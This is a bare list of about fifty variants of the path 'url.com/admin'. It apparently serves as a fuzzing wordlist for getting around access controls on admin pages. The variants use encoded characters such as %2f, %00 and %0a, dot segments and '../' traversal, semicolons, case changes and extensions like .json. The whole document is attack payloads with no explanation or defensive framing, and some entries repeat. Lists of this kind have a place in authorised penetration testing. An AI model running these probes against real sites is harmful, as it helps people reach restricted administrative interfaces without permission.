url.com/admin/?
url.com/admin//
url.com/admin///
url.com/admin/.//
url.com/admin??
url.com/admin?/
url.com/admin?/?
url.com/admin?//
url.com/admin#/
url.com/admin/#
url.com/admin.//
url.com/admin/
url.com/admin/%2f
url.com/admin/%20
url.com/admin/%09
url.com/admin/%00
url.com/admin/%0a
url.com/admin/%0d
url.com/admin/%25
url.com/admin/%23
url.com/admin/%26
url.com/admin/%3f
url.com/admin/%26/
url.com/admin/./
url.com/admin/.//.
url.com/./admin
url.com/././admin
url.com//./admin
url.com/./admin/
url.com/../admin/
url.com/admin/.//
url.com/admin/
url.com/admin/.;
url.com/%20/admin
url.com/%20/admin/%20
url.com/admin.json
url.com/admin//
url.com/admin/%00
url.com/admin.css
url.com/admin.html
url.com/admin?id=1
url.com/admin/;
url.com/admin/./
url.com/admin/\/
url.com/admin/%3B
url.com/admin/.%2f..%2f..%2f
url.com/ADMIN/
url.com/ADMIN/\..
url.com/admin/
url.com/ADMIN
url.com/ADMIN-IN


